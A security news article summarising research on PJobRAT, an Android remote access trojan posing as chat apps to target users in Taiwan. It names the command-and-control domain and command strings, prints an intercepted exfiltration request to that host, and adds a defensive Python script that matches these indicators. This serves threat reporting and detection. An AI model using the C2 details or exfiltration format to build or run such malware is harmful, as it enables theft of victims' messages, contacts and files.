PJobRAT, an Android Remote Access Trojan (RAT) first observed in 2019, has recently resurfaced with enhanced capabilities and a refined targeting strategy.
The malware, initially documented targeting Indian military personnel in 2021, has evolved to compromise users in Taiwan through sophisticated social engineering tactics.
By masquerading as legitimate dating and instant messaging applications, PJobRAT entices unsuspecting victims to download malicious apps from compromised websites.
The threat actor behind this operation demonstrates persistence and adaptability, with the latest campaign running for approximately 22 months from early 2023 through October 2024.
Distribution primarily occurred through WordPress sites hosting fake messaging apps such as “SaangalLite” (possibly mimicking SignalLite) and “CChat,” which impersonated a formerly legitimate application.
The relatively small infection footprint suggests highly targeted attacks rather than widespread campaigns.
Sophos researchers identified significant technical improvements in the latest PJobRAT variants.
The malware maintains its core functionality of exfiltrating sensitive information including SMS messages, contacts, device details, and media files, but now features enhanced command execution capabilities.
This evolution dramatically expands the threat actor’s control over compromised devices.
Infection
Once installed, the malicious applications present users with basic chat functionality, creating an illusion of legitimacy while covertly establishing persistence.
The apps request extensive permissions, including exemption from battery optimization to ensure continuous background operation.
The malware’s communication infrastructure employs a dual-channel approach for maximum resilience.
Firebase Cloud Messaging (FCM) serves as the primary command channel, enabling the threat actor to trigger various functions through predefined commands like “ace_am_ace” (upload SMS), “chall” (run shell command), and “kontak” (upload contacts).
This method cleverly conceals malicious traffic within expected Android communication patterns.
Secondary HTTP-based communication handles data exfiltration to the command-and-control server (westvist[.]myftp[.]org).
This channel transmits stolen information using multipart form requests, as demonstrated in the following intercepted traffic:
POST /m_chowa_srv/main.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a3c1b36e-3ce6-4117-8ed1-7af403ad1023
Content-Length: 1336
Host: westvist.myftp.org:3574
Connection: Keep-Alive
User-Agent: okhttp/4.10.0
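As an added example that is not part of the Sophos report or the original article, the script below shows how a defender could turn the captured request above into a simple network-detection check. It parses the head of a raw HTTP/1.1 request and scores it against the indicators the article gives (the C2 host westvist.myftp.org, the path /m_chowa_srv/main.php, a multipart POST upload, and the okhttp user agent). The two sample requests embedded in the script are constructed for this example; the helper names and the scoring scheme are assumptions, not anything from the malware or the report.

```python
import re
from dataclasses import dataclass

# Indicators taken from the article (the domain is defanged there as westvist[.]myftp[.]org).
C2_HOSTS = {"westvist.myftp.org"}
C2_PATHS = {"/m_chowa_srv/main.php"}


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of a raw HTTP/1.1 request (body ignored)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def host_only(host_header: str) -> str:
    """Strip the port so 'westvist.myftp.org:3574' matches the bare domain indicator."""
    return host_header.split(":")[0].strip().lower()


def score_request(req: HttpRequest) -> list:
    """Return the list of matched indicators; an empty list means nothing matched."""
    hits = []
    if host_only(req.headers.get("host", "")) in C2_HOSTS:
        hits.append("known C2 host")
    if req.path in C2_PATHS:
        hits.append("known C2 path")
    ctype = req.headers.get("content-type", "")
    if req.method == "POST" and ctype.startswith("multipart/form-data"):
        hits.append("multipart upload")
    # Weak indicator on its own: many legitimate Android apps use okhttp.
    if re.match(r"^okhttp/\d", req.headers.get("user-agent", "")):
        hits.append("okhttp client")
    return hits


def is_pjobrat_exfil(req: HttpRequest) -> bool:
    """High-confidence verdict: only the host or path indicators are strong enough alone."""
    hits = set(score_request(req))
    return bool(hits & {"known C2 host", "known C2 path"})


# Constructed sample 1: modelled on the capture shown in the article.
SAMPLE_EXFIL = """POST /m_chowa_srv/main.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a3c1b36e-3ce6-4117-8ed1-7af403ad1023
Content-Length: 1336
Host: westvist.myftp.org:3574
Connection: Keep-Alive
User-Agent: okhttp/4.10.0
"""

# Constructed sample 2: an ordinary request that should not match.
SAMPLE_BENIGN = """GET /api/status HTTP/1.1
Host: example.invalid
User-Agent: Mozilla/5.0
"""

if __name__ == "__main__":
    for label, raw in (("exfil", SAMPLE_EXFIL), ("benign", SAMPLE_BENIGN)):
        req = parse_request(raw)
        print(label, score_request(req), "-> PJobRAT:", is_pjobrat_exfil(req))
```

The split between `score_request` and `is_pjobrat_exfil` is deliberate: the multipart and okhttp signals are useful context in an alert but would generate noise if they fired on their own, so only the host and path indicators drive the verdict.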
While this specific campaign appears to have concluded, the continued evolution of PJobRAT highlights the persistent threat posed by sophisticated mobile malware targeting high-value individuals.